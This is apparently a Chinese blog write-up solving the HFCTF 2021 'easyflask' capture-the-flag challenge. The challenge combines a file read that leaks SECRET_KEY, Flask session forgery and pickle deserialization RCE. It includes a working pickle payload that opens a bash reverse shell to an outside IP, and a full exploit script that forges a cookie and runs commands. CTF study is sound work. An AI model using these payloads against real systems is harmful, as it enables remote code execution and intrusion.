[HFCTF 2021 Final]easyflask

最新推荐文章于 2023-05-25 15:42:29 发布
最新推荐文章于 2023-05-25 15:42:29 发布
阅读量1.6k 收藏 3
点赞数 1
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/118065324
版权

任意文件读取,根据提示读取源码
在这里插入图片描述

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):#如果u对应的值是字典,会读取  u.b
            u = b64decode(u.get('b'))
        u = pickle.loads(u)#pickle反序列化
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
app.run('0.0.0.0', port=80, debug=False)

很明显的一个session伪造加pickle反序列化rce。
从/proc/self/environ 获取环境变量,里面有secret_key可以拿这个secret_key伪造session。

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'tyskill',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/192.168.1.1/2333 0>&1'",))
})
u = pickle.dumps(User())
print(b64encode(u).decode())

命令执行那换上自己vps的ip,不过得在linux中运行这个脚本(我在kali用得是python2.7,发现python3和2出来的又不一样),不然生成得base64会出错,导致伪造得ssesion反序列化失败。
在这里插入图片描述在这里插入图片描述

利用flask-unsign这个工具生成恶意session。https://github.com/Paradoxis/Flask-Unsign
在这里插入图片描述

带着这个session去访问/admin,然后服务器监听即可。
在这里插入图片描述

如果只是为了flag的话还有一种方法就是命令执行的时候把flag写到/tmp目录下的某个文件中。
Exp一把梭,不过这个脚本要在linux下python3运行。 Windows下也还是不行。。。。

import base64
import pickle
from flask.sessions import SecureCookieSessionInterface
import re
import pickletools
import requests

url = "http://5a3ed6ba-e33e-4746-bfa4-6b9b7bc1d9ba.node3.buuoj.cn"

def get_secret_key():
    target = url + "/file?file=/proc/self/environ"
    r = requests.get(target)
    key = re.findall('key=(.*?)OLDPWD',r.text)
    return str(key[0])

secret_key = get_secret_key()
#secret_key = "glzjin22948575858jfjfjufirijidjitg3uiiuuh"

#print(secret_key)


class FakeApp:
    secret_key = secret_key

class User(object):
    def __reduce__(self):
        import os
        cmd = "cat /flag > /tmp/test1"
        return (os.system,(cmd,))

exp = {
    "b":base64.b64encode(pickle.dumps(User()))
}
print(exp)

fake_app = FakeApp()
session_interface = SecureCookieSessionInterface()
serializer = session_interface.get_signing_serializer(fake_app)
cookie = serializer.dumps(
    {'u':exp}
)
print(cookie)

headers = {
    "Accept":"*/*",
    "Cookie":"session={0}".format(cookie)
}

req = requests.get(url+"/admin",headers=headers)

req = requests.get(url+"/file?file=/tmp/test1",headers=headers)

print(req.text)

在这里插入图片描述

参考:https://www.yuque.com/jinjinshigekeaigui/alad3t/egit84#q9FBd
https://www.anquanke.com/post/id/239993

Arnoldqqq
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
final2021:决赛2021
04-09
决赛2021 决赛2021
Solution2021_Final
04-12
《CSS在Solution2021_Final中的应用与实践》 在信息技术领域,CSS(层叠样式表)作为网页设计的核心技术之一,对于构建美观、功能丰富的网页起着至关重要的作用。"Solution2021_Final"项目正是这样一个充分运用CSS...
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 finalCTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
CS251 Final Exam 2021
最新发布
12-24
You may use any (non-human) resource to answer the questions. You may not collaborate with others.
Final IK 2.2 - Unity
02-20
Final IK 2.2 - Unity
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1648
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
ctfshow_愚人杯WEB之easy_flask
XiaoXiao_RenHe的专栏
04-20 937
ctfshow愚人杯WEB之easy_flask重现步骤,cookie内容调整方法。
buuctf--easyflask
qq_46263951的博客
01-04 879
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
CTFSHOW 愚人杯easy_ssti
SanKobe的博客
05-25 314
另外这道题刚开始的源码那块对"f"和"ge"进行了处理,我不知道在其他思路里会不会卡住,我试了下可以在语句的最后直接加上"ge"绕过。在页面上查catch_warning的位置,再查class的位置就能大概查到是第几个类了。是flask的模板,分析一下源码应该就是在/hello目录下有SSTI注入的漏洞。用ls查了一下当前目录,app.py 里也没啥有用信息,和压缩包里是一样的。进入hello目录下并照常走一下判断流程,发现应该是jinja2的模板。猜测了一下,应该是将语句中的"/"当成目录了。
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者
09-28 1667
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
HSCSEC CTF 2023 web-EZSYFLASK-wp
……
02-24 272
flask的PIN码攻击
HZNUCTF-ezflask
qq_44640313的博客
03-27 566
jinja2的注入
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值